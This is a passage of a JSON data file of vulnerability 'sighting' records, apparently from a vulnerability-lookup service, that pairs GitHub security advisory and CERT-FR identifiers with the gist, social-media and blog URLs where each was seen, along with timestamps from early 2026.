{"uuid": "7c229461-b61a-4e0c-a8d0-6016f653ffce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c5cp-vx83-jhqx", "type": "seen", "source": "https://gist.github.com/alon710/2f95861974c42a3252ca6d0fed5d2df0", "content": "", "creation_timestamp": "2026-01-24T22:43:27.000000Z"}, {"uuid": "bb0adcfd-f32e-4de0-b60f-41696f278201", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9hvg-qw5q-wqwp", "type": "seen", "source": "https://gist.github.com/alon710/36ff76dd78755bad36a559ab1f8bb5a3", "content": "", "creation_timestamp": "2026-01-24T22:43:26.000000Z"}, {"uuid": "a7932e96-7b37-4869-89c4-0d419ae0ad13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5j4h-4f72-qpm6", "type": "seen", "source": "https://gist.github.com/alon710/8597ddf73adc8c2cc7626f7b8133e22c", "content": "", "creation_timestamp": "2026-01-24T22:43:25.000000Z"}, {"uuid": "08f93b1c-efcd-4d77-b2a7-e9b66011fcf9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mqhg-v22x-pqj8", "type": "seen", "source": "https://gist.github.com/alon710/6636c46aefa304e870a57fe8f70add59", "content": "", "creation_timestamp": "2026-01-24T22:43:23.000000Z"}, {"uuid": "474856e1-5860-4de5-8287-b31b43161507", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x5rw-qvvp-5cgm", "type": "seen", "source": "https://gist.github.com/alon710/789572622861ff4df18a1232c061ce0b", "content": "", "creation_timestamp": "2026-01-24T22:43:22.000000Z"}, {"uuid": "cf130b24-8a56-4d88-a573-c3f233b2a4a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jmr4-p576-v565", "type": "seen", "source": "https://gist.github.com/alon710/ef5b395825b05eb5000aef3b65898176", "content": "", "creation_timestamp": "2026-01-24T22:43:21.000000Z"}, {"uuid": "b2defd45-354b-49d6-8d24-b61bf8aa1605", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-528q-4pgm-wvg2", "type": "seen", "source": "https://gist.github.com/alon710/c9127533d7edd671bb1c78c6d4db8ca0", "content": "", "creation_timestamp": "2026-01-24T22:43:20.000000Z"}, {"uuid": "665836f5-2636-4184-9526-aa294c6630a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P4F6-H8JJ-VFVF", "type": "seen", "source": "https://gist.github.com/alon710/c9127533d7edd671bb1c78c6d4db8ca0", "content": "", "creation_timestamp": "2026-01-24T22:43:20.000000Z"}, {"uuid": "fb0a8ef1-f5d6-4412-97f4-d4f5bb5ca3d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-528q-4pgm-wvg2", "type": "seen", "source": "https://gist.github.com/alon710/4210237fae1a82fe0aad6aba0cd3603e", "content": "", "creation_timestamp": "2026-01-24T22:43:19.000000Z"}, {"uuid": "11ccc35a-8abc-4e56-8602-b8be5e48df4c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-955r-x9j8-7rhh", "type": "seen", "source": "https://gist.github.com/alon710/b71551ed06d9b3b1b46315dece499fba", "content": "", "creation_timestamp": "2026-01-24T22:43:13.000000Z"}, {"uuid": "7d23af8b-a82b-48f2-833f-4a015ebb2463", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-55r9-5mx9-qq7r", "type": "seen", "source": "https://gist.github.com/alon710/54c1ca0ee276425cc5a62776a9963d6b", "content": "", "creation_timestamp": "2026-01-24T22:43:12.000000Z"}, {"uuid": "8898bbb3-956f-4b52-8215-56ab70e180f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f69v-xrj8-rhxf", "type": "seen", "source": "https://gist.github.com/alon710/fb15730874be9f6d45272679812c968e", "content": "", "creation_timestamp": "2026-01-24T22:43:07.000000Z"}, {"uuid": "a6d6778e-024c-4b37-824b-fb2b17c94882", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-cw39-r4h6-8j3x", "type": "seen", "source": "https://gist.github.com/alon710/6ea497fa633d979c4b651698373b8b7b", "content": "", "creation_timestamp": "2026-01-24T22:43:04.000000Z"}, {"uuid": "7cfa3d08-3e66-43a4-9b90-a08f741ae9d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-53vf-c43h-j2x9", "type": "seen", "source": "https://gist.github.com/alon710/551e19221453d3e1c7b86196d2bc895f", "content": "", "creation_timestamp": "2026-01-24T22:43:02.000000Z"}, {"uuid": "6d96c1f5-d30e-4fa0-80f6-91baef85be1e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-824x-88xg-cwrv", "type": "seen", "source": "https://gist.github.com/alon710/853907bb6bab8c87366046f124466c6c", "content": "", "creation_timestamp": "2026-01-24T22:42:59.000000Z"}, {"uuid": "25b58bb7-9bb8-49b9-aeb7-438048ee3119", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pxj6-p3c4-8w6r", "type": "seen", "source": "https://gist.github.com/alon710/1a143c0d7ad068c59dfb5300f5debc9f", "content": "", "creation_timestamp": "2026-01-24T22:53:14.000000Z"}, {"uuid": "7fbb3844-0c0f-450d-89cf-fb2b703e3549", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4wp9-cf5h-v2g5", "type": "seen", "source": "https://bsky.app/profile/0xacb.com/post/3mdba37uwhz2s", "content": "", "creation_timestamp": "2026-01-25T17:13:30.546337Z"}, {"uuid": "3a899a2a-8a90-4f1b-a474-3fa724c24535", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CERTFR-2026-ACT-002", "type": "seen", "source": "https://bsky.app/profile/infosecfr.skyfleet.blue/post/3mdcd7d37fp2i", "content": "", "creation_timestamp": "2026-01-26T03:42:08.932806Z"}, {"uuid": "5bd71954-337b-47e5-8671-4972ae76fd32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hcx5-hrhj-xhq9", "type": "seen", "source": "https://bsky.app/profile/sublimer.mstdn.sublimer.me.ap.brid.gy/post/3mdd437szezk2", "content": "", "creation_timestamp": "2026-01-26T11:07:17.644353Z"}, {"uuid": "855f8974-5013-4be3-8b18-31d3a5d11d10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3cx6-j9j4-54mp", "type": "seen", "source": "https://gist.github.com/alon710/7111529b9905850774701948975383c7", "content": "", "creation_timestamp": "2026-02-03T18:40:05.000000Z"}, {"uuid": "da1abeb0-072f-4fb2-b589-b6dd1fea5e10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ccpr-m53r-mfwr", "type": "seen", "source": "https://bsky.app/profile/Whiskeyomega.cupoftea.social.ap.brid.gy/post/3mdy4bmu6ke42", "content": "", "creation_timestamp": "2026-02-03T19:37:11.800778Z"}, {"uuid": "a34ac4db-cd5a-4334-95c2-fc8f14a5280a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VWCG-C828-9822", "type": "seen", "source": "https://gist.github.com/alon710/95db41fd7f3f74d63cd995b18078b349", "content": "", "creation_timestamp": "2026-02-05T00:40:05.000000Z"}, {"uuid": "d9043a8f-f472-493f-aeea-9d2722954df8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6cqr-8cfr-67f8", "type": "seen", "source": "https://gist.github.com/alon710/f3522fe1631994e1a76ab218a2b4d685", "content": "", "creation_timestamp": "2026-02-05T01:40:05.000000Z"}, {"uuid": "d3851776-b437-466c-a364-94ca03ce758a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GGXW-G3CP-MGF8", "type": "seen", "source": "https://gist.github.com/alon710/5da984bde26467e39592160032ba5c17", "content": "", "creation_timestamp": "2026-02-05T02:40:06.000000Z"}, {"uuid": "c32b45e9-b29f-49a0-bd60-8bc5603f5d9a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-88qh-cphv-996c", "type": "seen", "source": "https://gist.github.com/alon710/d61e988d3abea6933e5eb5c34dd5a0ec", "content": "", "creation_timestamp": "2026-02-05T03:10:06.000000Z"}, {"uuid": "8b0b5279-7882-415d-b440-62a5fb0419f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-RXXP-482V-7MRH", "type": "seen", "source": "https://gist.github.com/alon710/732a365baf75b003d7cf4edcf078efda", "content": "", "creation_timestamp": "2026-03-03T11:10:09.000000Z"}, {"uuid": "7a58638f-e812-4414-840f-541b2e512af1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vrqc-59mw-qqg7", "type": "seen", "source": "https://gist.github.com/alon710/ac739fc815a71a1bbc17c69f0d2579f2", "content": "", "creation_timestamp": "2026-03-12T11:40:06.000000Z"}, {"uuid": "b1ec194d-34d4-4fff-a541-aea8c3329486", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-qffp-2rhf-9h96", "type": "seen", "source": "https://bsky.app/profile/lambdawatchdog.bsky.social/post/3mghrq22wxf2e", "content": "", "creation_timestamp": "2026-03-07T12:00:56.257754Z"}, {"uuid": "a1e6bb47-6a81-4df7-9d85-1e45c7ae0b88", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-6ggm-pwr9-r5h2", "type": "seen", "source": "https://gist.github.com/alon710/6c60d39994445dd225cb9c3de8678dd9", "content": "", "creation_timestamp": "2026-03-16T17:10:07.000000Z"}, {"uuid": "b840dd17-d221-4376-a5b7-bdf70fc6cbcc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-4j3x-hhg2-fm2x", "type": "seen", "source": "https://gist.github.com/alon710/766027522f4a24eebe6b64034afd846c", "content": "", "creation_timestamp": "2026-03-14T02:10:06.000000Z"}, {"uuid": "d71e3b70-2f13-4356-9970-3f5b37b4091f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7432-952r-cw78", "type": "seen", "source": "https://gist.github.com/alon710/2d123731c9da93f7319d6377d20965fd", "content": "", "creation_timestamp": "2026-03-16T18:10:06.000000Z"}, {"uuid": "ed2fefa3-a457-42aa-8b65-bedfb9988a97", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-jjpj-p2wh-qf23", "type": "seen", "source": "https://infosec.exchange/users/shadowserver/statuses/116165340674775673", "content": "", "creation_timestamp": "2026-03-03T12:53:52.659491Z"}, {"uuid": "4da5c7c9-d3d2-4b75-b520-447a0df883f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vpcf-gvg4-6qwr", "type": "seen", "source": "https://infosec.exchange/users/shadowserver/statuses/116165340674775673", "content": "", "creation_timestamp": "2026-03-03T12:53:52.562332Z"}, {"uuid": "a8db437e-7670-41f1-85b1-f08d70134469", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-wxx7-mcgf-j869", "type": "seen", "source": "https://infosec.exchange/users/shadowserver/statuses/116165340674775673", "content": "", "creation_timestamp": "2026-03-03T12:53:52.448029Z"}, {"uuid": "6cf7fa6d-0294-48f4-8883-971e3c653e86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-44vg-5wv2-h2hg", "type": "seen", "source": "https://gist.github.com/alon710/1291af57a3f24c084d79b6036abb3239", "content": "", "creation_timestamp": "2026-03-14T02:40:05.000000Z"}, {"uuid": "e63df203-3ba2-40b4-920b-592c377d3430", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g93w-mfhg-p222", "type": "seen", "source": "https://gist.github.com/alon710/d9b4a060fe174b9be8c2cbbf551e46b6", "content": "", "creation_timestamp": "2026-03-14T03:10:06.000000Z"}, {"uuid": "9e8f695a-300c-45ab-b3f6-3a5988ec71e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-ff64-7w26-62rf", "type": "seen", "source": "https://gist.github.com/hdknr/fd36299e0751373fd17f0ab90d49bf98", "content": "", "creation_timestamp": "2026-03-03T13:58:01.000000Z"}, {"uuid": "fd684d1c-c58b-4500-8235-d3a5b12e3701", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-g644-9gfx-q4q4", "type": "seen", "source": "https://gist.github.com/abhu85/37e5770c487c142ffc50e5429b6fc363", "content": "", "creation_timestamp": "2026-03-10T16:29:43.000000Z"}, {"uuid": "4ed6ed97-6662-47b8-9069-be83cae36229", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-j47w-4g3g-c36v", "type": "seen", "source": "https://gist.github.com/alon710/f9ee5ebf420bcb9120187c3f53874714", "content": "", "creation_timestamp": "2026-03-14T03:40:05.000000Z"}, {"uuid": "3b483473-67f8-4bfb-911b-bf821b94608c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-m6hv-x64c-27mm", "type": "seen", "source": "https://gist.github.com/alon710/9a8802d53b5fb158c5f6cb0e8400fffd", "content": "", "creation_timestamp": "2026-03-10T18:10:05.000000Z"}, {"uuid": "339fcfe6-13f1-4688-a63c-90540c7e5660", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-pf93-j98v-25pv", "type": "seen", "source": "https://gist.github.com/alon710/ab92af6bf1518fd7ebffd80c72fb5bb0", "content": "", "creation_timestamp": "2026-03-12T14:40:06.000000Z"}, {"uuid": "9aeda07e-a5a8-433d-ad63-4c2c3785357c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5M9R-P9G7-679C", "type": "seen", "source": "https://gist.github.com/alon710/aed471f71d18a585b1ac6741c86dd8af", "content": "", "creation_timestamp": "2026-03-14T04:10:06.000000Z"}, {"uuid": "814575b2-0649-44f7-b846-a3c409fe4de9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xxxx-xxxx-xxxx", "type": "seen", "source": "https://gist.github.com/openjny/0f6c31694b4337dd06b63c352290b14f", "content": "", "creation_timestamp": "2026-03-03T15:01:27.000000Z"}, {"uuid": "f4a5c096-c32f-4ebf-aa5a-df4c35a6b854", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-725G-W329-G7QR", "type": "seen", "source": "https://gist.github.com/alon710/ff6118da079f9d801f860c1d19254274", "content": "", "creation_timestamp": "2026-03-12T15:10:05.000000Z"}, {"uuid": "11b39639-a5bf-428f-b13c-9232b3c4cfdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-G353-MGV3-8PCJ", "type": "seen", "source": "https://gist.github.com/alon710/6d8cc1349cbd20b4b2228bf8920e9f07", "content": "", "creation_timestamp": "2026-03-14T04:40:05.000000Z"}, {"uuid": "46ee8e2e-926a-4777-94be-66e8feff6cde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-xjgw-4wvw-rgm4", "type": "seen", "source": "https://gist.github.com/alon710/318772c839d4af9a91549fceab76247e", "content": "", "creation_timestamp": "2026-03-10T19:10:06.000000Z"}, {"uuid": "2a39a801-d745-43d1-95f1-a7b58563973b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-7r34-79r5-rcc9", "type": "seen", "source": "https://gist.github.com/alon710/466922a78fd1f1a990595c00598870a1", "content": "", "creation_timestamp": "2026-03-10T19:40:06.000000Z"}, {"uuid": "a1c785da-c4af-415e-b8c3-eb0d713fa6e2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9ppg-jx86-fqw7", "type": "seen", "source": "https://bsky.app/profile/thecascading.bsky.social/post/3mgecfog2pk2u", "content": "", "creation_timestamp": "2026-03-06T02:48:42.572199Z"}, {"uuid": "03e31fd0-3abe-4def-b81c-cb186d813e54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "ghsa-mh23-rw7f-v5pq", "type": "seen", "source": "https://bsky.app/profile/flarestart.bsky.social/post/3mgeepm5qlq22", "content": "", "creation_timestamp": "2026-03-06T03:30:03.996431Z"}, {"uuid": "f71cf6e8-4301-45d1-981b-640be4a87225", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2rqg-gjgv-84jm", "type": "seen", "source": "https://gist.github.com/alon710/53513cb5aafafcdaa9513749a5663d41", "content": "", "creation_timestamp": "2026-03-14T05:10:05.000000Z"}, {"uuid": "c3c7fada-f3a6-4e08-9983-5c17ffa408a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-25PW-4H6W-QWVM", "type": "seen", "source": "https://gist.github.com/alon710/3e78bbd825aa833ce30636ac23456c1d", "content": "", "creation_timestamp": "2026-03-04T11:10:06.000000Z"}, {"uuid": "db437a02-4553-4833-8b6c-2267c684b537", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9r75-g2cr-3h76", "type": "seen", "source": "https://gist.github.com/alon710/6327cd7c8e0c4f035cf6ad7379bcfa32", "content": "", "creation_timestamp": "2026-03-06T20:10:06.000000Z"}, {"uuid": "10752171-d241-4efd-9cd9-6341661c450a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-mw96-cpmx-2vgc", "type": "seen", "source": "https://gist.github.com/jfrantz-cw/7363eda31101a3eee0cbd3579d22e0d2", "content": "", "creation_timestamp": "2026-03-11T16:55:24.000000Z"}, {"uuid": "98d78598-3486-42f4-bb0d-9bea0bcbb2f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-W7J5-J98M-W679", "type": "seen", "source": "https://gist.github.com/alon710/84656641e76e6cac1bcd394bf2b4a065", "content": "", "creation_timestamp": "2026-03-04T11:40:05.000000Z"}, {"uuid": "e470e6a9-1e9e-4870-846e-96bb4b1f9f9c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-79wj-8rqv-jvp5", "type": "seen", "source": "https://gist.github.com/alon710/c6f9f46bb80364d9d8a079167039fc0b", "content": "", "creation_timestamp": "2026-03-06T20:40:06.000000Z"}, {"uuid": "db3e8f43-8960-4fae-a743-cc3012749138", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "CERTFR-2026-ACT-010", "type": "seen", "source": "https://social.numerique.gouv.fr/users/cert_fr/statuses/116199538935463629", "content": "", "creation_timestamp": "2026-03-09T13:50:58.267097Z"}, {"uuid": "b0323c18-439c-4748-9257-518a9448bde3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-vv3h-7qwr-722v", "type": "seen", "source": "https://gist.github.com/alon710/2f5ac9f201724311bd0bb59616acb73c", "content": "", "creation_timestamp": "2026-03-11T18:10:06.000000Z"}, {"uuid": "a9018068-ba14-4478-a6a6-e1b713881966", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2f24-mg4x-534q", "type": "seen", "source": "https://gist.github.com/alon710/741d463a436134d071dd4a30bdde2bd7", "content": "", "creation_timestamp": "2026-03-13T06:40:06.000000Z"}, {"uuid": "f2cff9b1-5896-4628-9e64-69013844f9f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-3wf5-g532-rcrr", "type": "seen", "source": "https://gist.github.com/alon710/50660dc4d55027714a8cd550ac80fb4f", "content": "", "creation_timestamp": "2026-03-11T19:40:05.000000Z"}, {"uuid": "29ee68d0-90ae-454c-83ef-5a61d03799c3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-9jfh-9xrq-4vwm", "type": "seen", "source": "https://gist.github.com/alon710/42f2baf7f8222d8e21a959d90dfc0bba", "content": "", "creation_timestamp": "2026-03-11T20:10:06.000000Z"}, {"uuid": "e7d0d6c1-6718-4c0f-ac37-520bf8e2b73b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p2m9-wcp5-6qw3", "type": "seen", "source": "https://gist.github.com/alon710/1a09f125fb195b968cc4199dda20a349", "content": "", "creation_timestamp": "2026-03-13T07:40:05.000000Z"}, {"uuid": "ae1b7d08-719d-4620-8a03-14cd60052be3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-w6vw-mrgv-69vf", "type": "seen", "source": "https://github.blog/security/how-to-scan-for-vulnerabilities-with-github-security-labs-open-source-ai-powered-framework/", "content": "", "creation_timestamp": "2026-03-06T20:09:04.000000Z"}, {"uuid": "b802f5bb-7089-48cf-8738-badf46386e4b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-p6pv-q7rc-g4h9", "type": "seen", "source": "https://github.blog/security/how-to-scan-for-vulnerabilities-with-github-security-labs-open-source-ai-powered-framework/", "content": "", "creation_timestamp": "2026-03-06T20:09:04.000000Z"}, {"uuid": "2ffab47f-3e8b-4406-a7c7-c5e4729764d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-87fh-rc96-6fr6", "type": "seen", "source": "https://github.blog/security/how-to-scan-for-vulnerabilities-with-github-security-labs-open-source-ai-powered-framework/", "content": "", "creation_timestamp": "2026-03-06T20:09:04.000000Z"}, {"uuid": "100dec53-fc88-430d-b68f-e5d68617e412", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-q45j-x3cj-gjvq", "type": "seen", "source": "https://github.blog/security/how-to-scan-for-vulnerabilities-with-github-security-labs-open-source-ai-powered-framework/", "content": "", "creation_timestamp": "2026-03-06T20:09:04.000000Z"}, {"uuid": "e72416a9-0fdd-4280-9299-4d59d878123c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-c8xf-3j86-7686", "type": "seen", "source": "https://github.blog/security/how-to-scan-for-vulnerabilities-with-github-security-labs-open-source-ai-powered-framework/", "content": "", "creation_timestamp": "2026-03-06T20:09:04.000000Z"}, {"uuid": "57ddcaba-f6b0-438e-947a-07ea89a26508", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-5fw2-8jcv-xh87", "type": "seen", "source": "https://gist.github.com/alon710/01c81fe8f05cb94cbb46a686e8fd31c8", "content": "", "creation_timestamp": "2026-03-13T08:10:06.000000Z"}, {"uuid": "8861c8d8-6196-44bb-bbff-4c9aa352c2da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f8q5-h5qh-33mh", "type": "seen", "source": "https://gist.github.com/alon710/74a8a12bf6cb699bbfaf1a99d2e4e0d0", "content": "", "creation_timestamp": "2026-03-11T23:10:05.000000Z"}, {"uuid": "470e85ce-5a62-4de2-8230-4d94d03861eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-2cjm-2gwv-m892", "type": "seen", "source": "https://gist.github.com/alon710/9c1e259abefdf1f80109449941ee815f", "content": "", "creation_timestamp": "2026-03-13T08:40:05.000000Z"}, {"uuid": "90590ac2-759f-4340-ba85-2fea986855af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-QMPG-8XG6-PH5Q", "type": "seen", "source": "https://gist.github.com/alon710/178e46012f2aacadc77abdeb3a79629a", "content": "", "creation_timestamp": 